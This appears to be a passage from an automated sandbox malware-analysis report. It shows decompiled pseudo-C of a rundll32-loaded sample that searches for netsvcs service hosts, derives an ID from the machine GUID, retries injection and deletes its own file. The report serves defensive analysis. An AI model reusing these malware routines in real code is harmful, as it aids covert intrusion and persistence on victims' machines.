                                                                                              													_t85 =  *(_v412 + 0xc);
                                                                                              													if(_t85 != 0 && StrStrIW(_t85, L"-k netsvcs") != 0) {
                                                                                              														_t123 =  *_t137;
                                                                                              														_t87 = 0;
                                                                                              														asm("o16 nop [eax+eax]");
                                                                                              														while(1) {
                                                                                              															_t112 =  *((intOrPtr*)(_t142 + _t87 * 4 - 0x194));
                                                                                              															if(_t112 == _t123) {
                                                                                              																goto L21;
                                                                                              															}
                                                                                              															if(_t112 == 0) {
                                                                                              																 *((intOrPtr*)(_t142 + _t87 * 4 - 0x194)) = _t123;
                                                                                              																goto L21;
                                                                                              															} else {
                                                                                              																_t87 = _t87 + 1;
                                                                                              																if(_t87 < 0x64) {
                                                                                              																	continue;
                                                                                              																} else {
                                                                                              																	_t126 = CloseServiceHandle;
                                                                                              																	CloseServiceHandle(_t128);
                                                                                              																}
                                                                                              															}
                                                                                              															goto L23;
                                                                                              														}
                                                                                              													}
                                                                                              													goto L21;
                                                                                              												}
                                                                                              											}
                                                                                              											L23:
                                                                                              											_t72 = _v428;
                                                                                              										}
                                                                                              										_t72 = _t72 + 1;
                                                                                              										_t137 = _t137 + 0x2c;
                                                                                              										_v428 = _t72;
                                                                                              									} while (_t72 < _v416);
                                                                                              									_t108 = _v412;
                                                                                              								}
                                                                                              								LocalFree(_t108);
                                                                                              								LocalFree(_v432);
                                                                                              								CloseServiceHandle(_t103);
                                                                                              								_t134 = 0;
                                                                                              								while(1) {
                                                                                              									_t109 =  *((intOrPtr*)(_t142 + _t134 * 4 - 0x194));
                                                                                              									if( *((intOrPtr*)(_t142 + _t134 * 4 - 0x194)) == 0) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t122 = _v444;
                                                                                              									if(_v444 != 0) {
                                                                                              										_t78 = _v448;
                                                                                              										if(_v448 != 0) {
                                                                                              											_t79 = E04269000(_t103, _t109, _t122, _t126, _t134, _t78); // executed
                                                                                              											_t144 = _t144 + 4;
                                                                                              											if(_t79 != 0) {
                                                                                              												_v436 = _v436 + 1;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									_t134 = _t134 + 1;
                                                                                              									if(_t134 < 0x64) {
                                                                                              										continue;
                                                                                              									}
                                                                                              									break;
                                                                                              								}
                                                                                              								return E04275AFE(_v8 ^ _t142);
                                                                                              							} else {
                                                                                              								CloseServiceHandle(_t103);
                                                                                              								LocalFree(_v432);
                                                                                              								return E04275AFE(_v8 ^ _t142);
                                                                                              							}
                                                                                              						} else {
                                                                                              							CloseServiceHandle(_v412);
                                                                                              							return E04275AFE(_v8 ^ _t142);
                                                                                              						}
                                                                                              					} else {
                                                                                              						CloseServiceHandle(_t101);
                                                                                              						return E04275AFE(_v8 ^ _t142);
                                                                                              					}
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t142);
                                                                                              				}
                                                                                              			}








































                                                                                              0x0426bd60
                                                                                              0x0426bd69
                                                                                              0x0426bd70
                                                                                              0x0426bd75
                                                                                              0x0426bd82
                                                                                              0x0426bd88
                                                                                              0x0426bd8e
                                                                                              0x0426bd94
                                                                                              0x0426bda1
                                                                                              0x0426bda7
                                                                                              0x0426bdac
                                                                                              0x0426bdb8
                                                                                              0x0426bdbe
                                                                                              0x0426bdc0
                                                                                              0x0426bdc8
                                                                                              0x0426bdda
                                                                                              0x0426be02
                                                                                              0x0426be04
                                                                                              0x0426be0c
                                                                                              0x0426be27
                                                                                              0x0426be2e
                                                                                              0x0426be34
                                                                                              0x0426be36
                                                                                              0x0426be3e
                                                                                              0x0426be5f
                                                                                              0x0426be67
                                                                                              0x0426be71
                                                                                              0x0426be78
                                                                                              0x0426be7f
                                                                                              0x0426be80
                                                                                              0x0426be81
                                                                                              0x0426be87
                                                                                              0x0426be88
                                                                                              0x0426be8a
                                                                                              0x0426be8c
                                                                                              0x0426be8e
                                                                                              0x0426be93
                                                                                              0x0426bec3
                                                                                              0x0426bec5
                                                                                              0x0426becb
                                                                                              0x0426becd
                                                                                              0x0426becf
                                                                                              0x0426bed5
                                                                                              0x0426bedf
                                                                                              0x0426beeb
                                                                                              0x0426bef7
                                                                                              0x0426befa
                                                                                              0x0426bf00
                                                                                              0x0426bf04
                                                                                              0x0426bf10
                                                                                              0x0426bf16
                                                                                              0x0426bf1a
                                                                                              0x0426bf92
                                                                                              0x0426bf1c
                                                                                              0x0426bf37
                                                                                              0x0426bf87
                                                                                              0x0426bf88
                                                                                              0x0426bf8e
                                                                                              0x0426bf39
                                                                                              0x0426bf3f
                                                                                              0x0426bf44
                                                                                              0x0426bf56
                                                                                              0x0426bf58
                                                                                              0x0426bf5a
                                                                                              0x0426bf60
                                                                                              0x0426bf60
                                                                                              0x0426bf69
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426bf6d
                                                                                              0x0426bf80
                                                                                              0x00000000
                                                                                              0x0426bf6f
                                                                                              0x0426bf6f
                                                                                              0x0426bf73
                                                                                              0x00000000
                                                                                              0x0426bf75
                                                                                              0x0426bf76
                                                                                              0x0426bf7c
                                                                                              0x0426bf7c
                                                                                              0x0426bf73
                                                                                              0x00000000
                                                                                              0x0426bf6d
                                                                                              0x0426bf60
                                                                                              0x00000000
                                                                                              0x0426bf44
                                                                                              0x0426bf37
                                                                                              0x0426bf98
                                                                                              0x0426bf98
                                                                                              0x0426bf98
                                                                                              0x0426bf9e
                                                                                              0x0426bf9f
                                                                                              0x0426bfa2
                                                                                              0x0426bfa8
                                                                                              0x0426bfb4
                                                                                              0x0426bfb4
                                                                                              0x0426bfc1
                                                                                              0x0426bfc9
                                                                                              0x0426bfcc
                                                                                              0x0426bfce
                                                                                              0x0426bfd0
                                                                                              0x0426bfd0
                                                                                              0x0426bfd9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426bfdb
                                                                                              0x0426bfe3
                                                                                              0x0426bfe5
                                                                                              0x0426bfed
                                                                                              0x0426bff0
                                                                                              0x0426bff5
                                                                                              0x0426bffa
                                                                                              0x0426bffc
                                                                                              0x0426bffc
                                                                                              0x0426bffa
                                                                                              0x0426bfed
                                                                                              0x0426c002
                                                                                              0x0426c006
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426c006
                                                                                              0x0426c01e
                                                                                              0x0426be95
                                                                                              0x0426be96
                                                                                              0x0426bea3
                                                                                              0x0426bebb
                                                                                              0x0426bebb
                                                                                              0x0426be40
                                                                                              0x0426be46
                                                                                              0x0426be5e
                                                                                              0x0426be5e
                                                                                              0x0426be0e
                                                                                              0x0426be0f
                                                                                              0x0426be26
                                                                                              0x0426be26
                                                                                              0x0426bdcb
                                                                                              0x0426bdd8
                                                                                              0x0426bdd8

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 0426BDB8
                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 0426BE02
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?), ref: 0426BE0F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                                                              • String ID: -k netsvcs
                                                                                              • API String ID: 236840872-1604415765
                                                                                              • Opcode ID: 94bee353fd48ecd990e7d7b6f6cf49398ea6c0aade20c9548eb13027e6f3da10
                                                                                              • Instruction ID: db4a145cf557dcf537e104a57fb61c2d9c8e38d90a95c3e18b5577422bd5190d
                                                                                              • Opcode Fuzzy Hash: 94bee353fd48ecd990e7d7b6f6cf49398ea6c0aade20c9548eb13027e6f3da10
                                                                                              • Instruction Fuzzy Hash: AF71A471B14228AFDB24AF24AC95BEAB7B8EF49314F1100E9E50EE7141DB70BD818F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 78%
                                                                                              			E04265CA0(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				int _v540;
                                                                                              				intOrPtr _v556;
                                                                                              				void* _v564;
                                                                                              				int _v568;
                                                                                              				signed int _t11;
                                                                                              				void* _t14;
                                                                                              				int _t16;
                                                                                              				long _t29;
                                                                                              				void* _t31;
                                                                                              				signed int _t32;
                                                                                              
                                                                                              				_t11 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t11 ^ _t32;
                                                                                              				_t29 = GetCurrentProcessId();
                                                                                              				_v568 = 0;
                                                                                              				_t14 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                              				_t31 = _t14;
                                                                                              				_v564 = 0x22c;
                                                                                              				_push( &_v564);
                                                                                              				_t16 = Process32FirstW(_t31); // executed
                                                                                              				if(_t16 != 0) {
                                                                                              					while(_v556 != _t29) {
                                                                                              						if(Process32NextW(_t31,  &_v564) != 0) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              						}
                                                                                              						L6:
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_v568 = _v540;
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				L7:
                                                                                              				FindCloseChangeNotification(_t31); // executed
                                                                                              				return E04275AFE(_v8 ^ _t32);
                                                                                              			}














                                                                                              0x04265ca9
                                                                                              0x04265cb0
                                                                                              0x04265cbf
                                                                                              0x04265cc1
                                                                                              0x04265ccb
                                                                                              0x04265cd1
                                                                                              0x04265cd3
                                                                                              0x04265ce3
                                                                                              0x04265ce5
                                                                                              0x04265ced
                                                                                              0x04265cf6
                                                                                              0x04265d0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265d0c
                                                                                              0x04265d1a
                                                                                              0x00000000
                                                                                              0x04265d1a
                                                                                              0x04265d14
                                                                                              0x00000000
                                                                                              0x04265d14
                                                                                              0x04265d1b
                                                                                              0x04265d1c
                                                                                              0x04265d37

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04265CB5
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04265CCB
                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04265CE5
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04265D06
                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 04265D1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 1594840063-0
                                                                                              • Opcode ID: 2ce4152468e3d4456149564e384ac873e1d7c771ba71bf5abeae8ac12eef911f
                                                                                              • Instruction ID: eddafe94cb92f4b5c8adf49f8f669ab95d2d64a5eb93ef37beb85502d7589590
                                                                                              • Opcode Fuzzy Hash: 2ce4152468e3d4456149564e384ac873e1d7c771ba71bf5abeae8ac12eef911f
                                                                                              • Instruction Fuzzy Hash: FF012171B15229ABD720EF68F88CBA9B7B8EF09310F5001D5E805D3240DB78AE85CA55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 77%
                                                                                              			E04266050(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				intOrPtr _v72;
                                                                                              				intOrPtr _v76;
                                                                                              				intOrPtr _v80;
                                                                                              				intOrPtr _v84;
                                                                                              				char _v88;
                                                                                              				intOrPtr _v92;
                                                                                              				intOrPtr _v96;
                                                                                              				intOrPtr _v100;
                                                                                              				intOrPtr _v104;
                                                                                              				intOrPtr _v108;
                                                                                              				short _v112;
                                                                                              				intOrPtr _v116;
                                                                                              				intOrPtr _v120;
                                                                                              				intOrPtr _v124;
                                                                                              				intOrPtr _v128;
                                                                                              				intOrPtr _v132;
                                                                                              				intOrPtr _v136;
                                                                                              				intOrPtr _v140;
                                                                                              				intOrPtr _v144;
                                                                                              				intOrPtr _v148;
                                                                                              				intOrPtr _v152;
                                                                                              				intOrPtr _v156;
                                                                                              				intOrPtr _v160;
                                                                                              				intOrPtr _v164;
                                                                                              				intOrPtr _v168;
                                                                                              				intOrPtr _v172;
                                                                                              				short _v176;
                                                                                              				char _v252;
                                                                                              				void* _v256;
                                                                                              				int _v260;
                                                                                              				intOrPtr _v264;
                                                                                              				int _v268;
                                                                                              				signed int _t110;
                                                                                              				long _t117;
                                                                                              				intOrPtr _t118;
                                                                                              				signed int _t119;
                                                                                              				intOrPtr* _t142;
                                                                                              				void* _t144;
                                                                                              				signed int _t145;
                                                                                              				signed int _t147;
                                                                                              				signed short* _t156;
                                                                                              				signed int _t166;
                                                                                              				intOrPtr* _t169;
                                                                                              				signed int _t171;
                                                                                              				void* _t173;
                                                                                              				signed int _t175;
                                                                                              
                                                                                              				_t110 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t110 ^ _t175;
                                                                                              				_v264 = __edx;
                                                                                              				_v12 = 0;
                                                                                              				_v88 = 0x47007b;
                                                                                              				_t142 = __ecx;
                                                                                              				_v84 = 0x350036;
                                                                                              				_v80 = 0x590037;
                                                                                              				_v76 = 0x300053;
                                                                                              				_v72 = 0x2d0036;
                                                                                              				_v68 = 0x310030;
                                                                                              				_v64 = 0x440036;
                                                                                              				_v60 = 0x34002d;
                                                                                              				_v56 = 0x300043;
                                                                                              				_v52 = 0x2d0052;
                                                                                              				_v48 = 0x300036;
                                                                                              				_v44 = 0x320032;
                                                                                              				_v40 = 0x46002d;
                                                                                              				_v36 = 0x450047;
                                                                                              				_v32 = 0x430032;
                                                                                              				_v28 = 0x320033;
                                                                                              				_v24 = 0x360032;
                                                                                              				_v20 = 0x370036;
                                                                                              				_v16 = 0x7d0046;
                                                                                              				_v260 = 0x4a;
                                                                                              				_v176 = 0x4f0053;
                                                                                              				_v172 = 0x540046;
                                                                                              				_v168 = 0x410057;
                                                                                              				_v164 = 0x450052;
                                                                                              				_v160 = 0x4d005c;
                                                                                              				_v156 = 0x630069;
                                                                                              				_v152 = 0x6f0072;
                                                                                              				_v148 = 0x6f0073;
                                                                                              				_v144 = 0x740066;
                                                                                              				_v140 = 0x43005c;
                                                                                              				_v136 = 0x790072;
                                                                                              				_v132 = 0x740070;
                                                                                              				_v128 = 0x67006f;
                                                                                              				_v124 = 0x610072;
                                                                                              				_v120 = 0x680070;
                                                                                              				_v116 = 0x79;
                                                                                              				_v112 = 0x61004d;
                                                                                              				_v108 = 0x680063;
                                                                                              				_v104 = 0x6e0069;
                                                                                              				_v100 = 0x470065;
                                                                                              				_v96 = 0x690075;
                                                                                              				_v92 = 0x64;
                                                                                              				E0427DEA0(__edi,  &_v252, 0, 0x4a);
                                                                                              				_v256 = 0;
                                                                                              				_t117 = RegOpenKeyExW(0x80000002,  &_v176, 0, 0x20119,  &_v256); // executed
                                                                                              				if(_t117 == 0) {
                                                                                              					RegQueryValueExW(_v256,  &_v112, 0,  &_v268,  &_v252,  &_v260); // executed
                                                                                              					_t174 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v256);
                                                                                              					_t180 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) != 0 && _v260 == 0x4a) {
                                                                                              						asm("movups xmm0, [ebp-0xf8]");
                                                                                              						asm("movups [ebp-0x52], xmm0");
                                                                                              						asm("movups xmm0, [ebp-0xe8]");
                                                                                              						asm("movups [ebp-0x42], xmm0");
                                                                                              						asm("movups xmm0, [ebp-0xd8]");
                                                                                              						asm("movups [ebp-0x32], xmm0");
                                                                                              						asm("movups xmm0, [ebp-0xc8]");
                                                                                              						asm("movups [ebp-0x22], xmm0");
                                                                                              						asm("movq xmm0, [ebp-0xb8]");
                                                                                              						asm("movq [ebp-0x12], xmm0");
                                                                                              					}
                                                                                              				}
                                                                                              				_t169 = _t142;
                                                                                              				_t144 = _t169 + 2;
                                                                                              				do {
                                                                                              					_t118 =  *_t169;
                                                                                              					_t169 = _t169 + 2;
                                                                                              				} while (_t118 != 0);
                                                                                              				_t166 = 1;
                                                                                              				_t171 = _t169 - _t144 >> 1;
                                                                                              				asm("o16 nop [eax+eax]");
                                                                                              				do {
                                                                                              					_t119 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                                                              					if(_t119 >= 0x61 && _t119 <= 0x7a) {
                                                                                              						 *(_t175 + _t166 * 2 - 0x54) = _t119 + 0xffffffe0;
                                                                                              					}
                                                                                              					if( *(_t175 + _t166 * 2 - 0x54) != 0x2d) {
                                                                                              						asm("cdq");
                                                                                              						 *(_t175 + _t166 * 2 - 0x54) =  *(_t175 + _t166 * 2 - 0x54) ^  *(_t142 + _t166 % _t171 * 2);
                                                                                              						_t145 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                                                              						if(_t145 >= 0x30) {
                                                                                              							_t89 = _t145 - 0x3a; // -13
                                                                                              							if(_t89 > 6) {
                                                                                              								if(_t145 > 0x5a) {
                                                                                              									 *(_t175 + _t166 * 2 - 0x54) = 0x5a - _t145 % 0x1a;
                                                                                              								}
                                                                                              							} else {
                                                                                              								 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0x1a + 0x41;
                                                                                              							}
                                                                                              						} else {
                                                                                              							 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0xa + 0x30;
                                                                                              						}
                                                                                              					}
                                                                                              					_t166 = _t166 + 1;
                                                                                              				} while (_t166 < 0x25);
                                                                                              				_t156 =  &_v88;
                                                                                              				_t173 = _v264 - _t156;
                                                                                              				do {
                                                                                              					_t147 =  *_t156 & 0x0000ffff;
                                                                                              					_t156 =  &(_t156[1]);
                                                                                              					 *(_t173 + _t156 - 2) = _t147;
                                                                                              				} while (_t147 != 0);
                                                                                              				return E04275AFE(_v8 ^ _t175);
                                                                                              			}

































































                                                                                              0x04266059
                                                                                              0x04266060
                                                                                              0x04266068
                                                                                              0x04266070
                                                                                              0x0426607c
                                                                                              0x04266085
                                                                                              0x04266087
                                                                                              0x0426608e
                                                                                              0x04266095
                                                                                              0x0426609c
                                                                                              0x042660a3
                                                                                              0x042660aa
                                                                                              0x042660b1
                                                                                              0x042660b8
                                                                                              0x042660bf
                                                                                              0x042660c6
                                                                                              0x042660cd
                                                                                              0x042660d4
                                                                                              0x042660db
                                                                                              0x042660e2
                                                                                              0x042660e9
                                                                                              0x042660f0
                                                                                              0x042660f7
                                                                                              0x042660fe
                                                                                              0x04266105
                                                                                              0x0426610f
                                                                                              0x04266119
                                                                                              0x04266123
                                                                                              0x0426612d
                                                                                              0x04266137
                                                                                              0x04266141
                                                                                              0x0426614b
                                                                                              0x04266155
                                                                                              0x0426615f
                                                                                              0x04266169
                                                                                              0x04266173
                                                                                              0x0426617d
                                                                                              0x04266184
                                                                                              0x0426618b
                                                                                              0x04266192
                                                                                              0x04266199
                                                                                              0x042661a0
                                                                                              0x042661a7
                                                                                              0x042661ae
                                                                                              0x042661b5
                                                                                              0x042661bc
                                                                                              0x042661c3
                                                                                              0x042661ca
                                                                                              0x042661d2
                                                                                              0x042661f1
                                                                                              0x042661f9
                                                                                              0x0426621f
                                                                                              0x04266232
                                                                                              0x04266235
                                                                                              0x0426623b
                                                                                              0x0426623d
                                                                                              0x04266248
                                                                                              0x0426624f
                                                                                              0x04266253
                                                                                              0x0426625a
                                                                                              0x0426625e
                                                                                              0x04266265
                                                                                              0x04266269
                                                                                              0x04266270
                                                                                              0x04266274
                                                                                              0x0426627c
                                                                                              0x0426627c
                                                                                              0x0426623d
                                                                                              0x04266281
                                                                                              0x04266283
                                                                                              0x04266286
                                                                                              0x04266286
                                                                                              0x04266289
                                                                                              0x0426628c
                                                                                              0x04266293
                                                                                              0x04266298
                                                                                              0x0426629a
                                                                                              0x042662a0
                                                                                              0x042662a0
                                                                                              0x042662a8
                                                                                              0x042662b2
                                                                                              0x042662b2
                                                                                              0x042662bd
                                                                                              0x042662c1
                                                                                              0x042662c8
                                                                                              0x042662cd
                                                                                              0x042662d5
                                                                                              0x042662ec
                                                                                              0x042662f3
                                                                                              0x0426630d
                                                                                              0x04266321
                                                                                              0x04266321
                                                                                              0x042662f5
                                                                                              0x04266303
                                                                                              0x04266303
                                                                                              0x042662d7
                                                                                              0x042662e5
                                                                                              0x042662e5
                                                                                              0x042662d5
                                                                                              0x04266326
                                                                                              0x04266327
                                                                                              0x04266336
                                                                                              0x0426633d
                                                                                              0x04266340
                                                                                              0x04266340
                                                                                              0x04266343
                                                                                              0x04266346
                                                                                              0x0426634b
                                                                                              0x04266360

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                              • RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: -$-$-$0$2$2$2$3$6$6$6$6$6$7$C$F$F$G$J$M$R$R$S$S$W$\$\$c$d$e$f$i$i$o$p$p$r$r$r$s$u$y
                                                                                              • API String ID: 3677997916-1672344200
                                                                                              • Opcode ID: 51655c533b7f9e1c4cbf775683524964ecf8bbc3a658ae32bf5fd1fb26f91bd4
                                                                                              • Instruction ID: 7d92cf8f2b6a1ff43a1988a2b108e9b0b99672a2bb1fb2cd62741e95cabd9a61
                                                                                              • Opcode Fuzzy Hash: 51655c533b7f9e1c4cbf775683524964ecf8bbc3a658ae32bf5fd1fb26f91bd4
                                                                                              • Instruction Fuzzy Hash: 70817F71E1025DCBDB258F94D9487EEBBB5FF45304F0081AAD409AB201E7B95AC9CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 92%
                                                                                              			E0426C250(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v208;
                                                                                              				short _v728;
                                                                                              				short _v1248;
                                                                                              				short _v1768;
                                                                                              				long _v1772;
                                                                                              				signed int _t19;
                                                                                              				int _t31;
                                                                                              				int _t34;
                                                                                              				void* _t37;
                                                                                              				signed int _t39;
                                                                                              				void* _t43;
                                                                                              				void* _t46;
                                                                                              				void* _t48;
                                                                                              				void* _t50;
                                                                                              				void* _t58;
                                                                                              				void* _t61;
                                                                                              				void* _t64;
                                                                                              				void* _t67;
                                                                                              				intOrPtr _t68;
                                                                                              				intOrPtr _t70;
                                                                                              				void* _t93;
                                                                                              				long _t94;
                                                                                              				void* _t96;
                                                                                              				void* _t97;
                                                                                              				void* _t98;
                                                                                              				signed int _t99;
                                                                                              
                                                                                              				_t64 = __ecx;
                                                                                              				_t61 = __ebx;
                                                                                              				_t19 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t19 ^ _t99;
                                                                                              				_t96 = GetModuleFileNameW;
                                                                                              				_t93 = __ecx;
                                                                                              				GetModuleFileNameW(0,  &_v1248, 0x104);
                                                                                              				if(lstrcmpiW(E0427D9BE( &_v1248, 0x5c) + 2, L"rundll32.exe") != 0) {
                                                                                              					GetModuleFileNameW(0,  &_v728, 0x104);
                                                                                              					_t31 = E0427D9BE( &_v728, 0x2e) + 2;
                                                                                              					__eflags = _t31;
                                                                                              					if(_t31 != 0) {
                                                                                              						_t67 =  *L"dat"; // 0x610064
                                                                                              						 *_t31 = _t67;
                                                                                              						_t68 =  *0x429f710; // 0x74
                                                                                              						 *((intOrPtr*)(_t31 + 4)) = _t68;
                                                                                              						_t34 = PathFileExistsW( &_v728);
                                                                                              						__eflags = _t34;
                                                                                              						if(_t34 != 0) {
                                                                                              							goto L5;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_push(_t64);
                                                                                              					_t58 = E0426C130(_t93,  &_v1768,  &_v728);
                                                                                              					_t106 = _t58;
                                                                                              					if(_t58 != 0) {
                                                                                              						MoveFileExW( &_v1768, 0, 4); // executed
                                                                                              						L5:
                                                                                              						E0427DEA0(_t93,  &_v208, 0, 0xc8);
                                                                                              						_t37 = E04266FC0(_t61,  &_v208, _t93, _t96, _t106); // executed
                                                                                              						_t97 = _t37;
                                                                                              						_t107 = _t97;
                                                                                              						if(_t97 <= 0) {
                                                                                              							_t70 =  *0x42a65f8; // 0x38f, executed
                                                                                              							E04266C70(_t61, _t70, _t93, _t97, __eflags); // executed
                                                                                              						} else {
                                                                                              							E04266C70(_t61, _t97, _t93, _t97, _t107);
                                                                                              							E04266DF0( &_v208, _t97);
                                                                                              						}
                                                                                              						_t39 = E04265960(); // executed
                                                                                              						_v1772 = 0;
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t43 = E04269770( &_v1772,  &_v728,  ~( ~_t39) + 1); // executed
                                                                                              						_t98 = _t43;
                                                                                              						if(_t98 != 0) {
                                                                                              							_t94 = _v1772;
                                                                                              							_t109 = _t94;
                                                                                              							if(_t94 != 0) {
                                                                                              								E042696B0(_t61, _t98, _t94, _t94, _t98, _t109); // executed
                                                                                              								E04265540(_t98, _t94);
                                                                                              								_t46 = E042694D0(_t61, L"Control", _t94, _t98, _t109); // executed
                                                                                              								if(_t46 == 0x1fffffff || _t46 == 0x2fffffff) {
                                                                                              									E042578B0(_t61, L"Control", 0, _t94, _t98, 0);
                                                                                              								}
                                                                                              								_t48 = E042694D0(_t61, L"Dispatch", _t94, _t98, 0); // executed
                                                                                              								if(_t48 == 0x1fffffff || _t48 == 0x2fffffff) {
                                                                                              									E042578B0(_t61, L"Dispatch", 0, _t94, _t98, 0);
                                                                                              								}
                                                                                              								_t50 = E0426BD60(_t61, _t98, _t94, _t94, _t98); // executed
                                                                                              								if(_t50 <= 0) {
                                                                                              									_push(_t61);
                                                                                              									do {
                                                                                              										E0426BBC0();
                                                                                              										Sleep(0x3e8);
                                                                                              									} while (E0426BD60(Sleep, _t98, _t94, _t94, _t98) <= 0);
                                                                                              								}
                                                                                              								VirtualFree(_t98, 0, 0x8000); // executed
                                                                                              								DeleteFileW( &_v728); // executed
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t99);
                                                                                              			}






























                                                                                              0x0426c250
                                                                                              0x0426c250
                                                                                              0x0426c259
                                                                                              0x0426c260
                                                                                              0x0426c264
                                                                                              0x0426c279
                                                                                              0x0426c27b
                                                                                              0x0426c2a5
                                                                                              0x0426c2dc
                                                                                              0x0426c2ef
                                                                                              0x0426c2ef
                                                                                              0x0426c2f2
                                                                                              0x0426c2f8
                                                                                              0x0426c2fe
                                                                                              0x0426c300
                                                                                              0x0426c306
                                                                                              0x0426c310
                                                                                              0x0426c316
                                                                                              0x0426c318
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426c318
                                                                                              0x0426c2a7
                                                                                              0x0426c2a7
                                                                                              0x0426c2b1
                                                                                              0x0426c2b9
                                                                                              0x0426c2bb
                                                                                              0x0426c2cc
                                                                                              0x0426c31e
                                                                                              0x0426c32c
                                                                                              0x0426c33a
                                                                                              0x0426c33f
                                                                                              0x0426c341
                                                                                              0x0426c343
                                                                                              0x0426c35b
                                                                                              0x0426c361
                                                                                              0x0426c345
                                                                                              0x0426c347
                                                                                              0x0426c354
                                                                                              0x0426c354
                                                                                              0x0426c366
                                                                                              0x0426c36d
                                                                                              0x0426c37d
                                                                                              0x0426c389
                                                                                              0x0426c38e
                                                                                              0x0426c395
                                                                                              0x0426c39b
                                                                                              0x0426c3a1
                                                                                              0x0426c3a3
                                                                                              0x0426c3ad
                                                                                              0x0426c3b6
                                                                                              0x0426c3c0
                                                                                              0x0426c3ca
                                                                                              0x0426c3da
                                                                                              0x0426c3da
                                                                                              0x0426c3e4
                                                                                              0x0426c3ee
                                                                                              0x0426c3fe
                                                                                              0x0426c3fe
                                                                                              0x0426c407
                                                                                              0x0426c40e
                                                                                              0x0426c410
                                                                                              0x0426c417
                                                                                              0x0426c417
